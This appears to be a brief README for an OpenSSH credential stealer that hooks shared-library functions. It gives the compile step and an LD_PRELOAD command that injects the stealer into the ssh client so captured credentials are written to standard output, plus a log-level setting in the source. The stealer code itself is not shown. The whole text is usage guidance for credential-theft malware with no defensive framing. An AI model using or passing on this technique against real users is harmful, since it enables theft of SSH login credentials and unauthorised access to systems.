OpenSSH client credentials stealer by functions hooking
- you should hijacking a shared library used by ssh (
ldd /bin/ssh
) - output written to STDOUT
make # Compile SharedObject File
LD_PRELOAD=$PWD/stealer.so ssh user@localhost
you can set log level by LOG_LEVEL
value
// src/stealer.c - line 16
#define LOG_LEVEL <>
Used Levels: LOG_TRACE, LOG_INFO